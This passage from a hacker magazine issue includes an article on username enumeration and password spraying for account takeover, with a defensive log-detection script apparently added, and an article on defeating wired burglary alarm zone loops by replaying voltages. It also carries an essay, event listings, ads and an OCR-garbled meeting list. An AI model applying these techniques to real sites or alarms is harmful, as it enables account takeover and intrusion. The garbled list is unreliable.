Let me explain this very common configu- 
ration which in a high percentage of sites is 
exploitable. 

For a moment, let’s disregard any automa- 
tion safeguards such as Captcha or lockout via 
IP addresses. Although some top tier applica- 
tions have these features, your thousands of 
mid-level ecommerce and company web applications
typically do not (in my experience). To 
authenticate a non MultiFactor Authentication 
enabled account, a user must know two things: 
an email address/username and a password. 
Guess which one is harder to figure out in bulk 
if there are no enumeration vulnerabilities? 
Password? Guess again. The email addresses 
for all but the largest applications (Amazon, 
eBay, sites with millions of users) are going to 
be harder to guess in bulk. The reason is that 
for a mid-size application, I can likely guess a 
common person such as Joe Smith will have 
an account. What I cannot easily guess is that 
user’s email address. Popular freemail services 
like gmail are so saturated that unless Joe 
was an early adopter, he does not own 
“joe.smith@gmail.com”, “jsmith@gmail.com”, or 
even “josephsmith@gmail.com”. His address 
is more likely to be “jsmith00217@gmail.com” 
or “joseph.r.smith@some_local_randomass_ISP_provider.com”. 
To put it another way, I would rather take 
the bet that one of the knucklehead users 
of an application has the password 
“Trump2020” than bet that a user of the 
application has the email address 
“joe.smith@gmail.com”. Seems counterintuitive, right? 
This is compounded by the fact that almost all 
public websites have weak password policies 
of eight characters and one special character 
or number. The overall point I am trying to 
get at is that if bulk compromises are the goal 
(not compromising one specific account), a 
valid email address is at least as valuable to an 
attacker as a known password. 

Although damn near every website is 
vulnerable to email address enumeration, 
most are vulnerable to it via the password 
reset function, which gives a unique message 
stating that the recovery email has been sent, 
or that the account has been sent a recovery 
email. To an attacker, these are not particu- 
larly useful because the user has been alerted 
with an email, and now the account is (likely) 
locked until the unique link gets clicked and 
the password is reset. There is plenty of room 
for “issues” in that process, but that is not the 
focus of this discussion. What I consider to be 
a very exploitable and common (mis)configu- 
ration that leaves many sites vulnerable to 
account takeovers is at a glance a non-finding 
for many pentesters. If a site allows you to 
authenticate using an email address or a user- 
name, it is game on. Why? Because most sites 
that use usernames allow you to create them. If 
you can create a username, you can enumerate 
usernames. There isn’t a feasible way that an 
application can keep people from registering 
an already taken username without telling the 
user that the account is available or taken. 
AKA enumeration. Usually it is a simple GET 
request to an API that looks something along 
the lines of: 

GET /API/user/<USERNAME>/check 


Many applications return a simple true 
or false value in a JSON blob indicating if 
the username is available. Others may return 
an encoded response that is numeric, but 
those are still vulnerable to enumeration. 
The problem with this is that now an attacker 
can create a word list of common names and 
common last names with all the letters of the 
alphabet in front of them to throw at the API. 
This is usually the most common enumeration 
vulnerability for web applications. In the 
worst enumeration cases (which are amazingly 
common), user accounts are assigned an incre- 
mented numerical number that coincides with 
the username. At that point an attacker can 
essentially dump the application’s user data- 
base by walking the API call using consecutive 
numbers with a proxy automation tool such as 
Burp Intruder. 

Other areas that are prime for user account 
enumeration include messaging functionality 
that auto-completes your typing. If you start to 
type “Bob” and the application starts to auto- 
complete for you, then you can usually just 
turn on intercept with your proxy tool to catch 
the AJAX/XHR request so you can replay 
the GET request to alphabetically enumerate 
usernames (typically returned in JSON blobs). 
Parse or grep through the JSON for the win. 

At the heart of exploitation for username 
enumeration is the method of password 
spraying. Password spraying is the exact 
inverse of brute forcing. Instead of submitting 
many passwords for one account, we submit 
many accounts with the same password. This 
is a useful attack for two reasons. If you want 
authenticated access to an environment, the 
details of which account grants access are not 
important. The other reason is that by submit- 
ting one password to hundreds of accounts, 
you will not lock out any users, or likely alert 
them about the failed authentication attempt. 

Critical mass for successfully password 
spraying enumerated accounts varies. From 
my experience, I am usually performing an 
account takeover after only one password 
spray if I have around 300-400 usernames 
enumerated. 

What is an effective way to thwart this 
incredibly easy account takeover method? Do 
not allow usernames for authentication. Sure, 
you can have them assigned to accounts and 
used once you are in the application, but make 
the users authenticate with an email address. If 
you configure an application in this manner, the 
hard-to-fix username enumeration vulnerabili- 
ties still exist, but they don’t give the attacker 
50 percent of the authentication request. The 
most likely place to get a solid email address 
list to spray is by mining previous breaches 
and hitting the application with a long list, 
which can be slow. In the end, time is money 
for an attacker... and for a pentester. 
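
A defender's view of the two patterns described above, as an added example that is not part of the original article: a log review that flags a source probing the username check endpoint for many distinct names, and a source failing logins across many accounts with only a try or two on each (the pattern a per-account lockout counter never sees). The log layout, the `/login` route, the 401/200 status convention, and the thresholds are assumptions, the log lines are constructed, and the input is assumed to be one review window's worth of traffic.

```python
import re
from collections import Counter, defaultdict

CHECK_RE = re.compile(r"^/API/user/([^/]+)/check$")  # endpoint shape from the article
LOGIN_PATH = "/login"                                # assumed login route
LINE_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\d{3}) user=(\S+)$")


def build_sample_log():
    """Constructed lines: '<time> <src> <method> <path> <status> user=<name|->'."""
    lines = [
        # Ordinary traffic, including one user who mistypes a password three times.
        "2019-10-01T09:00:01Z 198.51.100.7 GET /API/user/alice/check 200 user=-",
        "2019-10-01T09:00:09Z 198.51.100.7 POST /login 200 user=alice",
        "2019-10-01T09:02:00Z 198.51.100.9 POST /login 401 user=bob",
        "2019-10-01T09:02:05Z 198.51.100.9 POST /login 401 user=bob",
        "2019-10-01T09:02:11Z 198.51.100.9 POST /login 401 user=bob",
        "2019-10-01T09:02:20Z 198.51.100.9 POST /login 200 user=bob",
    ]
    # One source walking consecutive numeric IDs through the check endpoint.
    lines += [
        f"2019-10-01T10:00:{i:02d}Z 203.0.113.5 GET /API/user/{1000 + i}/check 200 user=-"
        for i in range(40)
    ]
    # One source trying 30 accounts once each; a single attempt succeeds.
    for i in range(30):
        status = 200 if i == 17 else 401
        lines.append(
            f"2019-10-01T11:{i:02d}:00Z 203.0.113.77 POST /login {status} user=user{i:02d}"
        )
    return lines


def parse(lines):
    """Turn log lines into event dicts, skipping anything that does not match."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            ts, src, method, path, status, user = m.groups()
            events.append({"ts": ts, "src": src, "method": method,
                           "path": path, "status": int(status), "user": user})
    return events


def find_enumeration(events, min_names=20):
    """Sources that asked the check endpoint about many distinct usernames."""
    names = defaultdict(set)
    for e in events:
        m = CHECK_RE.match(e["path"])
        if e["method"] == "GET" and m:
            names[e["src"]].add(m.group(1))
    findings = {}
    for src, seen in names.items():
        if len(seen) < min_names:
            continue
        numeric = sorted(int(n) for n in seen if n.isdecimal())
        # Count numeric names that directly follow another requested name.
        steps = sum(1 for a, b in zip(numeric, numeric[1:]) if b - a == 1)
        findings[src] = {
            "distinct_names": len(seen),
            "sequential_walk": len(numeric) > 1 and steps >= 0.8 * (len(numeric) - 1),
        }
    return findings


def find_spray(events, min_accounts=15, max_tries_per_account=2):
    """Sources failing against many accounts with very few tries on each."""
    fails = defaultdict(Counter)  # src -> failures per account
    wins = defaultdict(set)       # src -> accounts that logged in successfully
    for e in events:
        if e["method"] != "POST" or e["path"] != LOGIN_PATH:
            continue
        if e["status"] == 401:
            fails[e["src"]][e["user"]] += 1
        elif e["status"] == 200:
            wins[e["src"]].add(e["user"])
    findings = {}
    for src, per_account in fails.items():
        wide = len(per_account) >= min_accounts
        shallow = max(per_account.values()) <= max_tries_per_account
        if wide and shallow:
            findings[src] = {
                "accounts_failed": len(per_account),
                # Successes from a spraying source are accounts to reset first.
                "accounts_to_reset": sorted(wins[src]),
            }
    return findings


if __name__ == "__main__":
    events = parse(build_sample_log())
    print("enumeration:", find_enumeration(events))
    print("spray:", find_spray(events))
```

The user with three failures on one account is what a lockout counter is built for and is not flagged here; the spraying source never exceeds one failure per account, so it only shows up when failures are grouped by source.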


Burglary Zone Input Tester 
An Experimental Design for Testing 
Hardwired Connected Sensors 


by Cezary Jaronczyk 


Commercial burglary alarm systems protect 
many facilities that are important for 
the safe operation of energy, water, transport 
systems, and so on. Among the safest security 
systems are those where the sensors are wired 
to the input circuits of the alarm systems or 
the zone loop inputs. However, if we perform 
a successful attack blocking the sensor using 
the device described here, it may turn out that 
certified burglary alarm systems previously 
considered to fulfill their security functions 
should no longer be considered as such and, 
for the safety of the protected facility, 
should be supplemented with security 
solutions against the presented attack. 


Compromising 
Hardwired Connections 

As the hardware zone loop is powered 
by a constant voltage level delivered by the 
burglary control unit or a zone expander, it is 
very easy to build and to apply devices that 
can read and remember the voltage level in the 
zone loop and later, on a request, feed it back 
to the zone loop. 


When, for example, the applied compro- 
mising voltage level represents the status of 
“closed door” (window or other barriers), 
then opening the door (window or other 
barriers) will not affect the zone loop voltage 
level because a burglary control unit sees the 
zone loop status as not changed. In this way, 
someone can access a protected area without 
being noticed. 

In the case where more than two wires 
count in a zone loop, more compromising 
devices may be used to connect to the wires in 
a circular pattern, in order to monitor and then 
substitute all voltages presented in the zone’s 
loop circuits. 

Figure 1 presents a full schematic of a 
device that can be used to compromise a 
burglary alarm system with a wired zone loop 
powered by a constant voltage level. If the zone 
input is compromised successfully, opening 
the door or window with a contact switch as 
a sensor makes the burglary alarm think that the 
door or window is still closed. If this burglary 
alarm is certified, the certification probably 
did not meet all the burglary alarm standards’ 
requirements regarding input circuits. 


“Information is Neutral” 
and Other Social Myths 

by Red_Liberty 


When we hackers say “information is 
neutral” and “information should be free,” a 
common response to this is, “What the hell 
are you talking about?” They then would, of 
course, cite the Four Horsemen of the Info- 
calypse (terrorists, drug dealers, pedophiles, 
and organized crime) and other examples of 
how information is not neutral. To which we 
would assert that the same violent response, 
according to reason, should inevitably follow 
when we say something along the lines of, “we 
hold these truths to be self-evident, that all 
men are created equal, that they are endowed 
by their creator with certain unalienable rights, 
that among these are life, liberty, and the 
pursuit of happiness.” 

Clearly some information is very harmful, 
and clearly humans are not at all created equal, 
nor do they have some abstract, intrinsic, 
inalienable rights. These are objective facts, 
nothing more, nothing less. 

When we say these things, we mean they 
ought to be as we say they “are” insofar as 
something even greater is concerned. 

Human rights may be social myths, nothing 
more than meaningless abstractions. But do 
not say this to that one particular social orga- 
nization that holds a monopoly on violence in 
human society, that is used as an instrument 
for the suppression of one class over another: 
the state. Because if you say that to the state, 
you might end up with something similar to 
the modern People’s Republic of China where 
there is no real negative liberty (freedom of 
the press, speech, protest, religion, etc.) at all. 
Similarly, some information causes real world 
harm and shouldn’t exist. But don’t tell that 
to the state or to your local Internet Service 
Provider. They just might censor your access 
to certain information, and their ability to see 
what you are doing at all poses a serious threat 
to the existence of individual liberty as such. 
You might end up with an incredibly filtered 
Internet where downloading a song that turns 
out to be pirated can land you serious jail time. 

This is what we mean when we say “infor- 
mation is neutral” and “information should be 
free.” This is what we mean when we say “all 
humans are created equal, and have certain 
inalienable rights.” We are not idiots here. 
Sometimes it is necessary to say things as they 
ought to be, not as they are. This is necessary 
precisely because the result of doing so is 
benevolent to society as a whole, and not doing 
so is to society’s detriment. 

Human rights do not exist, but they should 
be respected. No individual or institution 
should have the right to murder you because 
of something unfavorable you wrote about me. 

Information is not neutral, but it should be 
free. No individual or institution should have 
the right to censor and monitor you. 

The inevitable result here, of affirming 
things as they are, is for the worst possible 
scenario to be derived thereof. This is why 
social myths are necessary in human society. 
Do they cause harm? Certainly, and these 
harms should be mercilessly combated. 
“Human rights” are constantly an excuse 
imperialism uses to justify its own nefarious 
ends under the cloak of benevolence. But even 
with these truly terrible abuses, the net social 
harm caused is far less than the net social 
harm that would be caused without them. Just 
ask anyone working on the Tor Project why 
their work is necessary in spite of the known 
abuses of the Tor network. Without a formal 
recognition of human rights, every country 
in the world would likely have its own Stasi 
or Gestapo. This is why when you ask me, I 
say “Yes, information is neutral and should be 
free.” This is why when you ask me, I say “Yes 
human rights exist and should be respected.” 

We as hackers have a responsibility to 
promote a free and open Internet where infor- 
mation is free, and if that means using the 
same social myths that human rights advocates 
use, then I say it’s worth it. 



HACKER HAPPENINGS 


Listed here are some upcoming events of interest to hackers. Hacker conferences generally don’t cost 
a fortune and are open to everyone. If you know of a conference or event that should be known to 
the hacker community, email us at happenings@2600.com or by snail mail at Hacker Happenings, 
PO Box 99, Middle Island, NY 11953 USA. We only list events that have a firm date and location, 
aren’t ridiculously expensive, are open to everyone, and welcome the hacker community. 


October 18-20 
Maker Faire Rome 
Fiera di Roma 
Rome, Italy 
www.makerfairerome.eu 


October 24-25 
GrrCON 
DeVos Place 
Grand Rapids, Michigan 
grrcon.org 


November 8-9 
PhreakNIC 
Clarion Inn 
Murfreesboro, Tennessee 
phreaknic.info 


November 15-17 
Hack3rCon X 
Charleston Coliseum and Convention Center 
Charleston, West Virginia 
www.securewv.org 


December 27-30 
Chaos Communication Congress 
Congress Center Leipzig 
Leipzig, Germany 
www.ccc.de 


January 31 - February 2 
ShmooCon XVI 
Washington Hilton Hotel 
Washington DC 
www.shmoocon.org 


May 8-9 
THOTCON 0xB 
Chicago, Illinois 
thotcon.org 


May 15-17 
NolaCon 
Hyatt Centric 
New Orleans, Louisiana 
nolacon.com 


June 12-14 
CircleCityCon 7.0 
The Westin 
Indianapolis, Indiana 
circlecitycon.com 


August 6-9 
DEF CON 28 
Caesars Forum, Harrah’s, Linq, Flamingo 
Las Vegas, Nevada 
www.defcon.org 


Check www.hope.net 21-Oct-2019 


Please send us your feedback on any events you attend 
and let us know if they should/should not be listed here. 


Marketplace 


For Sale 
HACKER WAREHOUSE is your one stop shop for hacking 
equipment. We understand the importance of tools and gear 
which is why we carry only the highest quality gear from the 
best brands in the industry. From WiFi Hacking to Hardware 
Hacking to Lock Picks, we carry equipment that all hackers 
need. Check us out at HackerWarehouse.com. 

CLUB-MATE is now easy to get in the United States! The 
caffeinated German beverage is a huge hit at any hacker 
gathering. Available in two quantities: $36.99 per 12 pack or 
$53.99 per 18 pack of half liter bottles plus shipping. Write to 
contact@club-mate.us or order directly from store.2600.com. 
HACKERSTICKERS.COM now carries cDe merchandise, 
sells lock pick sets, Bawls energy mints, and an awesome 
lineup of hacker clothing including the new Johnny Cupcakes x 
HackerStickers collaboration Hacker Big Kid Shirt. Get all the 
goods at HackerStickers.com. 

GUIDEBOOK TO COMPUTER AND SMARTPHONE 
SECURITY by Brandon of Lipani Technologies LLC has 
been released. This new security book can be purchased at 
https://leanpub.com/techgeek. Brandon is a certified CompTIA 
Security+ professional helping users and companies secure their 
computers, networks, and smartphones across the country. He 
says, “The purpose of this book is to educate and teach computer 
and smartphone users about safety and ry online.” 
HEATHKIT BOOK: Interested in vintage electronics? 
Classic Heathkit Electronic Test Equipment by Jeff Tranter 
covers Heathkit’s test equipment line, with in depth coverage 
of different models including oscilloscopes, meters, tube testers, 
etc., as well as a history of Heathkit and resources for collecting 
and restoration. 140 pages in 11 chapters plus appendices. 
Retails for $19.95 from lulu.com and amazon.com. 

OPEN SOURCE HARDWARE: crowdfunded and in-stock on 
Crowd Supply (crowdsupply.com). Includes software-defined 
radios (SDRs), DIY computers, NASs, FPGA boards, open 
silicon (RISC-V), hardware encryption/security devices, kite- 
balloons, workbench tools, optical decoders, and opportunities 
to help fight the DMCA (see bunnie huang’s NeTV2 project). 
SECUREMAC.COM is offering popular anti-malware 
app MacScan 3 to help protect Mac users from malware, 
spyware, and ransomware. Download a 30-day trial directly 
from SecureMac.com. Looking for a new podcast? Check out 
The Checklist by SecureMac on iTunes, Pandora, and Spotify. 
PORTABLE PENETRATOR. WiFi Pen Testing software. 
Find WPA, WPA2, WPS, WiFi Keys. Vulnerability Scanning 
& Assessment Customize reports to use for consulting. Coupon 
code 20% off: 2600. https://shop.secpoint.com 

SAN ANTONIO RADIO MEMORIES - LET ‘EM OUT! 
Remembering San Antonio Radio (and technology) in the 
40s, 50s, 60s, and 70s. Profits go to ARRL. Visit www. 
velocepress.com/books/arts/sarm.php to order today! 


Help Wanted 

JOIN THE HTTPS://CODEFOR.CASH community and earn 
money with freelance programming jobs. All hats welcome! 
PERSONAL ASSISTANT. I need someone to go online for 
me because I’m incarcerated and have no Internet access so 
I’m looking to hire a personal assistant. Pay: As agreed per 
project about 1-5 hours per month, you choose your hours. 
Duties: Internet research, Internet shopping, sending e-mail, etc. 
Must Have: Own phone, Internet access, computer and printer. 
Experience: No experience necessary but the following skills 
and interests are helpful. Self-motivated, the ability to follow 
instructions, and an attention to details. Computer and Internet 
skills. With an interest in the rehabilitation of criminals and the 
mentally ill, helping others, fundraising, and advertisement. 
Please mail me your name, contact address, and phone 
number, along with reason I should pick you. Eugene Banks, 
1111 Highway 73. Moose Lake, MN 55767-9452 


Announcements 

OFF THE HOOK is the weekly one hour hacker radio show 
presented Wednesday nights at 7:00 pm ET on WBAI 99.5 
FM in New York City. You can also tune in over the net at 
www.2600.com/offthehook. Archives of all shows dating back 
to 1988 can be found at the 2600 site in mp3 format! Your 
feedback on the program is always welcome at oth@2600.com. 
COVERTACTIONS.COM is the most comprehensive 
directory of encryption products anywhere. Search by type, 
hardware/software, country, open source, platform, and more. 
Now over 1036 products listed which include 221 VPN’s, 192 
messaging and 117 file encryption apps. These are just a few of 
the 28 categories available. There is no faster and easier way 
to find the encryption product that meets your requirements. 
Suggestions and feedback welcome. Now featuring news on 
important encryption issues. 

DON’T JUST CELEBRATE TECHNOLOGY, question its 
broad-reaching effects. 78 Reasonable Questions to Ask About 
Any Technology - tinyurl.com/questiontech 


Services 

HAVE YOU SEEN THE 2600 STORE? Plenty of features, 
hacker stuff, and all sorts of possibilities. We accept Bitcoin 
and Google Wallet, along with the usual credit cards and 
PayPal. EVERY YEAR of 2600 and EVERY HOPE TALK now 
available for digital download! Plus, we've lowered prices on 
much of our stock. Won’t you pay us a visit? store.2600.com 
UNIX SHELL ACCOUNTS WITH MORE VHOSTS. If 
you like funny, relevant vhosts for IRC, get a JEAH shell. You 
can also use vhost domains for email. Access new and classic 
*nix programs, compilers, and languages. JEAH.NET hosts 
bouncers, bots, IRCD, and websites. 2600 readers get free setup! 
BTW: Domains from FYNE.COM come with free DNS hosting 
and WHOIS privacy for $5. 

DIGITAL FORENSICS FOR THE DEFENSE! Sensei 
Enterprises believes in the Constitutional right to a zealous 
defense, and backs up that belief by providing the highest 
quality digital forensics and electronic evidence support for 
criminal defense attorneys. Sensei’s digital forensic examiners 
hold the prestigious CISSP, CCE, CEH, and EnCE certifications. 
Our veteran experts are cool under fire in a courtroom - and their 
forensic skills are impeccable. We recover data nationwide from 
many sources, including computers, external media, tablets, 
and smartphones. We handle a wide range of cases, including 
hacking, child pornography possession/distribution, solicitation 
of minors, theft of proprietary data, data breaches, interception 
of electronic communications, identity theft, rape, murder, 
embezzlement, wire fraud, racketeering, espionage, cyber 
harassment, cyber abuse, terrorism, and more. Our principals 
are co-authors of Locked Down: Practical Information 
Security for Lawyers, 2nd edition (American Bar Association 
2016), Encryption Made Simple for Lawyers (American Bar 
Association 2015), and hundreds of articles on digital forensics 
and an award-winning blog on electronic evidence. They lecture 
throughout North America and have been interviewed by 
ABC, NBC, CBS, CNN, Reuters, many newspapers, and even 
Oprah Winfrey’s O magazine. For more information, call us at 
703.359.0700 or email us at sensei@senseient.com. 

GET YOUR HAM RADIO LICENSE! KB6NU's “No 
Nonsense” study guides make it easy to get your Technician 
Class amateur radio license or upgrade to General Class or Extra 
Class. They clearly and succinctly explain the concepts, while 
at the same time give you the answers to all of the questions on 
the test. The PDF version of the Technician Class study guide 
is free, but there is a small charge for the other versions. All of 
the e-book versions are available from 
www.kb6nu.com/study-guides/. Paperback versions are available 
from Amazon. E-mail cewgeek@kb6nu.com for more information. 
DOUBLEHOP.ME is an edgy VPN startup aiming to 
rock the boat with double VPN hops and encrypted multi- 
datacenter interconnects. We enable clients to VPN to country 
A, and transparently exit country B. Increase your privacy 
with multiple legal jurisdictions and leave your traditional 
VPN behind! We don’t keep logs, so there’s no way for 
us to cooperate with LEOs, even if we felt compelled to. 
We accept Bitcoin and offer automated order processing! 
Use promo code COSBYSWEATER2600 for 50% off 
(https://www.doublehop.me). 

INTELLIGENT HACKERS UNIX SHELL: Reverse.Net is 
owned and operated by Intelligent Hackers. We believe every 
user has the right to online security and privacy. In today’s 
hostile anti-hacker atmosphere, intelligent hackers require the 
need for a secure place to work, compile, and explore without 
big-brother looking over their shoulder. Hosted in Chicago 
with Filtered DoS Protection. Multiple Dual Core FreeBSD 
servers. Affordable pricing from $5/month, with a money back 
guarantee. Lifetime 26% discount for 2600 readers. Coupon 
Code: 2600. http://www.reverse.net/ 

ANTIQUE COMPUTERS. From Altos to Zorba and 
everything in between - Apple, Commodore, DEC, IBM, 
MITS, Xerox... vintagecomputer.net is full of classic computer 
hardware restoration information, links, tons of photos, video, 
document scans, and how-to articles. A place for preserving 
historical computers, maintaining working machines, running 
a library of hard-to-find documentation, magazines, SIG 
materials, BBS disks, manuals, and brochures from the 1950s 
through the early WWW era. http://www.vintagecomputer.net 
SKEPTICAL OF GITHUB? sr.ht is an in-progress software 
suite for hosting open source projects that’s more in tune with 
the hacker way. sr.ht is more modular and more flexible, with 
features like mailing list driven development and full virt build 
automation with KVM. Interested in helping test the beta? 
Reach out to SirCmpwn: sir@cmpwn.com 

SQUIDIX provides serious discounts for fantastic web hosting 
for 2600 readers. We love our clients and they love us. Our 2600 
promotion will give you a Super Squid hosting platform for 
only $26.00 for the first year, then only $9.95 per month when 
paid annually. Sign up today and get free domain or domain 
renewal. This offer valid for any new accounts in 2018 and 
includes a free CPanel transfer of one existing site. Sign up at 
www.squidix.com 

LOCKPICKING101.COM - a locksport community driven 
by lock picking hobbyists and locksmiths alike. New to lock 
picking or want to advance your skills or help others learn? Just 
head over to LockPicking101.com and say Mr. Picks sent you! 
ASPIRING TO BE THE MOST ETHICAL TECH SHOP 
IN THE WORLD, Technoethical.com offers the largest catalog 
of hardware products certified by the Free Software Foundation 
(FSF) to Respect Your Freedom (RYF) [fsf.org/resources/hw/ 
endorsement/technoethical]. As a user of Technoethical devices, 
you have the maximum control over your computing, being able 
to use, copy, modify, and distribute all the bits in the operating 
system and, when possible, even at lower levels, such as the boot 
firmware. The shop sells laptops and servers pre-installed with 
a fully free (as in freedom) BIOS replacement and GNU/Linux- 
libre distributions verified and endorsed by the FSF. All x86_64 
devices serviced and sold have Intel's intentional backdoor, 
the Management Engine [u.fsf.org/2g0], completely removed. 
As the only shop that sells phones with Replicant [replicant. 
us] pre-installed, you can be the first hacker on your block to 
own an Android-based device with an operating system that 
can be compiled completely from source with no proprietary 
blobs. You can also buy from Technoethical a diverse array of 
WiFi adapters that work with drivers and firmware that are fully 
hackable and operate also in the Access Point mode. Moreover, 
Technoethical provides installation/liberation services for all 
computers that are also sold as products. You can ship your 
compatible computer to Technoethical, or ask the team to 
organize a workshop in your local hackerspace or free software 
event. With 4 years of experience on the market, Technoethical 
is operated by a geographically distributed team of hackers 
from North America, the European Union, Russia, and Australia 
that closely follow the software freedom principles of the 
GNU project. Use the coupon code 2600MAG to receive a 
5% discount on all Technoethical products. Order today and 
join Richard Stallman among the many happy customers of 
Technoethical! 


Personals 

I AM A 36-YEAR-OLD FREE SOFTWARE ACTIVIST, 
interested in all aspects of copyright, trademark, and patent 
law. Looking to meet similar minded women, 26-43 in the 
greater-Seattle area. My interests are GNU/Linux, social justice, 
Mexican food, ghouls, model trains, and video games. Just a 
Crash looking for my Burn. I have strong opinions about obscure 
media formats. I like drinking, cooking, doodling, and wildlife. 
Let’s hit the clubs, make each other laugh. I like a laugh, chat, bit 
of a debate, an argument. I like life. Goldentee@gnu.org 

I AM A WOMAN INCARCERATED IN FEDERAL 
PRISON. I’m hoping to find an intelligent, curious penpal 
with hacker mentality. I will be released sometime around the 
holidays this year. While I am here, I do a lot of reading. I’m 
finishing a vet assisting correspondence course, studying more 
about Linux, and trying to remain healthy in an unhealthy 
environment. Besides 2600, I read SciAm, cyberpunk, history, 
animal welfare, behavior and psychology, law and politics - 
especially computer-related. My interests are far ranging and 
diverse. I have many passions from outdoor fun to Internet 
freedom, whistleblower, transparency and privacy causes. I AM 
opinionated (for example, if you do not support WikiLeaks, 
don’t bother writing), yet also funny, idealistic, and caring. I 
love to learn and think, and there is not a lot of that available 
here. I’m considered white collar crime for providing dark web 
info and anti-facial recognition tools to others. So please write (I 
can also email if you send your email handle) and tell me what 
you're about and what’s going on in your world. I like science, 
politics, everything tech - but most of all, a person willing to 
take time to be an LED in this often dim and dark world. Stacia 
Quarto, 92274051 Unit 2 South, FMC Carswell, PO Box 27137, 
Ft. Worth, TX 76127. 


ONLY SUBSCRIBERS CAN ADVERTISE IN 2600! Don’t 
even think about trying to take out an ad unless you subscribe! 
All ads are free and there is no amount of money we will accept 
for a non-subscriber ad. We hope that’s clear. Of course, we 
reserve the right to pass judgment on your ad and not print it if 
it’s amazingly stupid or has nothing at all to do with the hacker 
world. We make no guarantee as to the honesty, righteousness, 
sanity, etc. of the people advertising here. Contact them at your 
peril. All submissions are for ONE ISSUE ONLY! If you want 
to run your ad more than once you must resubmit it each time. 
Don’t expect us to run more than one ad for you in a single issue 
either. Include your address label/envelope or a photocopy so 
we know you’re a subscriber. If you’re an electronic subscriber, 
please send us a copy of your subscription receipt. Send your 
ad to 2600 Marketplace, PO Box 99, Middle Island, NY 11953 
You can also email your ads to marketplace@2600.com. 


Deadline for Winter issue: 11/21/19. 


We Did IT! 


It took many years and lots of caffeine, 
but we’ve finally finished two major digitizing projects. 


Every full volume of The Hacker Digest has now been digitized into 
PDF format. Each digest is comprised of that year’s issues of 2600. 
That means you can now get every single year of 2600 going back to 
1984. If you’re the kind of person who wants it all, then this may be 
just what you’ve been waiting for. 


For $260 you can get EVERY YEAR from the beginning and EVERY 
YEAR into the future - all completely copyable and able to be viewed 
on multiple devices. You'll be amazed at how much hacker material 
will be at your fingertips. 


AND THAT’S NOT ALL! 


Every single recorded talk from all of our conferences is now available 
on flash drives or downloadable from our store - all DRM-free so you 
can make as many copies as you want. They’re completely uncut, 
have no annoying YouTube ads, are in the highest quality, 
and can be played virtually everywhere. 


Want a collection of ALL of the talks from every single HOPE conference? 
For $249, you’ll get a bunch of 128gb flash drives chock full of talks from 
all 12 of our conferences, along with helpful navigation and descriptions. 


For more details on these and other awesome deals, visit store.2600.com. 


ANNOUNCING THE 2600 
TOTE BAG! 


$7.99 each, 
4 for $29.99 plus shipping 


Find this and all kinds of other fun 
hacker stuff at store.2600.com 


ARGENTINA 
Buenos Aires: Bellagamba Bodegon, 
Armenia 1242, Ist table.to the leftof the 
front Jae 
Catamarea Rincon Universitario, AV: 
Belgrano 41 Ist fidor. Pip 
Paranag Orig hove Bar ervantes 
384. 8 pm 
‘Saaveda: Pizagfia La Bingola de Sad¥geira. 
Av. Catt 4499, Capital Pederal"? prt 
AUSTRALIA 
Central Coast: Central Coast L 
Club (ground floor, outdoor area). 6 
Melbourne: The Charles Dickens 
Block Arcade, 290 Collins St. 
Sydney: Metropolitan Hotel, | Bridg 
St. 6 pm 


AUSTRIA 
Vienna: RIAT - Institute for Future 
Cryptoeconomics, Neubaugasse 64-66/3/4 
BELGIUM 
Antwerp: Central Station, top of the stairs 
in the main hall. 7 pm 
BRAZIL 
Belo Horizonte: Pelego’s Bar at Assufeng 
near the payphone. 6 pm 
CANADA 
Alberta 
Calgary: Food court of Eau Claire 
Market. 6 pr 
Edmonton: Elep 
(0314 Whyte Ave. 
box. 6 pm 


ant & Castle Pub, 
big red telephone 


British Columbia 
Kamloops: Student St in Old Main in 
of Tim Horton's, TRU ca 
Vanec 
food court 


wver: Intemational Vill 


Manitoba 
Winnipeg: St. Vita 
court by HMV 
New Brunswick 
Moncton: Champlain Mall food court, 
near KFC. 7 pm 
Newfoundland 
St. John’s: Memorial University Center 
f the Dairy Queen). 
Ontario 
Ottawa: World Exchange Plaza, 111 
Albert St, 2nd floor. 6:30 pm 
Toronto: Free Times Cafe, Coll 
Spadina 
Windsor: Sandy's, 7120 Wyandotte 
St E. 6 pm 


shopping center, food 


food court (in fre 


CHINA 
Hong Kong: Frites Quarry Bay, G/F 
Oxford House. 

COSTA RICA 
Heredia: Food court, P: de las 
Flores Mall 


CZECHIA 

Prague: Legenda pub. 6 pm 
DENMARK 
Aalborg: Fast Eddie’s pool hall 
Aarhus: In the far corner of the DSB cafe 
in the railway station 
Copenhagen: Cafe Blasen. 
Sonderborg: Cafe Druen. 7:30 pm 
FINLAND 
Helsinki: Forum shopping center 
(Mannerheimintie 20), food court on 
floor zero 
FRANCE 
Paris: Burger King, 1st floor, Place de la 
Republique. 6 pm 
GERMANY 
Alexa shopping mall 


\derplatz) in front of Manju. 7 pm 

GREECE 
Athens: Outside the bookstore 
Papasotiriou on the corner of Patision and 
Stournari. 7 pm 

IRELAND 

Dublin: At the entrance to the Dublin 
Tourism Information Centre on Suffolk 
St 

ISRAEL 
*Beit Shemesh: In the big Fashion Mall 
(across from train station), 2nd floo 
court. Phone: 1-800-800-515, 7 pm 
*Safed: Courtyard of Ashkenazi Ari, 
ITALY 

Milan: Piazza Loreto in front of 
McDonalds. 


JAPAN 
Kagoshima: Amu Plaza next to the central 
railway station in the basement food court 
(Food Cube) near Doutor Coffee 
Tokyo: Mixing Bar near Shinjuku Station, 
2 blocks east of east exit. 6:30 pm 
KAZAKHSTAN 
Astana: CheckPoint Brasserie 
Koshkarbayeva St 34. 8 pm 
MEXICO 
Chetumal: Food court at La Plaza de 
Americas, right front near Italian food. 
Mexico City: “Zocalo” Subway Station 
(Line 2 of the “METRO” subway, the filbe 
he! c “Departamento del Distrito 
al” exit, near the payphones and 
the candy shop. at of the 
Zabalo-PingSuare2™ tyghel 
NETHERLANDS 
Utrecht: In front of the Burger King at 
Utrecht Central Station. 7 pm 
NORWAY 
Oslo: Station at the “meeting 
point” area in the main hall. 7 pm 
Tromsoe: The upper floor at Blaa Rock 
Cafe, Strandgata 14. 6 pm 
Trondheim: Den Gode Nabo. 7 pm 
PERU 
Lima: Barbilonia (ex Apu Bar), en 
Alcanfores 455, Miraflores, at the end of 
Tarata St. 8 pm 
Trujillo: Starbucks, Mall Aventura 
Plaza. 6 pm 
PHILIPPINES 
Quezon City: Chocolate Kiss ground 
floor, Bahay ng Alumni, University of the 
Philippines Diliman. 4 pm 
POLAND 
